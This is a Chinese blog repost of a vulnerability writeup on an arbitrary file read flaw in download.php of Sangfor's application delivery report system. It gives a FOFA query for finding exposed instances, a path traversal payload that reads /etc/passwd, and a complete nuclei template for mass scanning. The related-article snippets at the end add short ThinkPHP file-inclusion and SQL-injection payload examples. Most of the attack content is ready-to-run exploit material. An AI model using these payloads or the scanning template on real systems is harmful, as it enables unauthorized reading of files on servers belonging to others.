首页 > 编程语言 >深信服应用交付报表系统download.php任意文件读取漏洞

深信服应用交付报表系统download.php任意文件读取漏洞

时间:2023-08-29 23:44:37浏览次数:39  
标签:读取 .. 漏洞 交付 download php 报表

漏洞描述

深信服 应用交付报表系统download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。

漏洞影响

深信服 应用交付报表系统

漏洞复现

fofa搜索环境复现:app="SANGFOR-应用交付报表系统"
登录页面:

payload:/report/download.php?pdf=../../../../../etc/passwd

nuclei批量yaml文件

id: sangfor_baobiao_fileread
info:
  name: 应用交付报表系统download.php任意文件读取漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: regex
        regex:
          - "root:.*:0:0:"

标签:读取,..,漏洞,交付,download,php,报表
From: https://www.cnblogs.com/pursue-security/p/17666147.html

相关文章

  • ThinkPHP框架简介
    ThinkPHP是单一入口框架。即:在一个网站中,所有的请求都指向同一个脚本文件。使用PHP创建项目:新建一个项目,在index.php文件中:<?phpdefine('APP_NAME','app');define('APP_PATH','./APP/');require('./ThinkPHP/ThinkPHP.php'); 配置文件:config.php若自定义一个配置文件,需要在co......
  • thinkphp5 日期+group by + 分页paginate查询
    <?php//根据日期来统计所消耗的点数//模型的使用方法$result=$model->field("id,FROM_UNIXTIME(createtime,'%Y-%m-%d')as`createtime`,sum(price)ascount_price")->group("FROM_UNIXTIME(createtime,'%Y-%m-%d'),store......
  • Java中使用JTS对空间几何计算(读取WKT、距离、点在面内、长度、面积、相交等)
    场景基于GIS相关的集成系统,需要对空间数据做一些判断处理。比如读取WKT数据、点到点、点到线、点到面的距离,线的长度、面的面积、点是否在面内等处理。JTS(JavaTopologySuite)Java拓扑套件,是Java的处理地理数据的API。github地址:https://github.com/locationtech/jtsAPI......
  • ThinkPHP 多语言本地文件包含漏洞
    ThinkPHP多语言本地文件包含漏洞ThinkPHP是一个再中国使用比较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意php文件。虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可......
  • Gson读取json字符串中结果需要转泛型的情况解决方案
    原始代码:Gsongson=newGson();ArrayList<Fld>fixed=gson.fromJson(newFileReader(headFilePath),ArrayList.class);for(Fldfld:fixed){intfld_len=fld.getFld_len();}错误显示:com.g......
  • ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
    ThinkPHP5SQL注入漏洞&&敏感信息泄露启动后,访问http://10.10.10.154/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。漏洞利用访问http://10.10.10.154/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:当然,这是一个比较鸡......
  • 通过pandas读取excel数据,很多数据开头带有'特殊字符,如何处理?
    大家好,我是皮皮。一、前言前几天在Python最强王者群【wen】问了一个Pandas数据处理的问题,一起来看看吧。请教问题:通过pandas读取excle数据,很多数据开头带有'特殊字符,我用replace或者strip()函数处理均无法处理。二、实现过程这里【瑜亮老师】也给了一个代码,如下所示:df.columns......
  • SHT20温湿度传感器数据读取/HAL/硬件I2C
    SHT20CommandHold/NoHoldMasterModeHoldMasterMode:SHT20在测量完之前会拉低SCL,暂停通信。NoHoldMastermode:测量未完成,SHT20只回应NACK*数据最后两位是状态位,计算时置0#include"S_SHT20.h"#include"S_IIC.h"#include"stdio.h"/**SHT20地址:100000......
  • centos7.9+php+apache 配置阿里云ssl
     1、前往阿里云官网申请免费证书选择 2、证书存放在/etc/cert 3、httpd.cof配置ssl<VirtualHost_default_:443> ServerName域名 DocumentRoot网站根目录 SSLEngineon SSLProtocolall-SSLv2-SSLv3 SSLCipherSuiteHIGH:!RC4:!MD5:!aNULL:!eNULL:!NULL:......
  • 实用指令_大数据shell_读取控制台输入
    read读取控制台输入基本语法read(选项)(参数)选项-p:指定读取值时的提示符-t:指定读取值时等待的时间(秒),如果没有在指定的时间内输入,就不再等待了。变量:指定读取值的变量名应用实例应用案例1:读取控制台输入的一个num值应用案例2:读取控制台输入的一个num值,在10......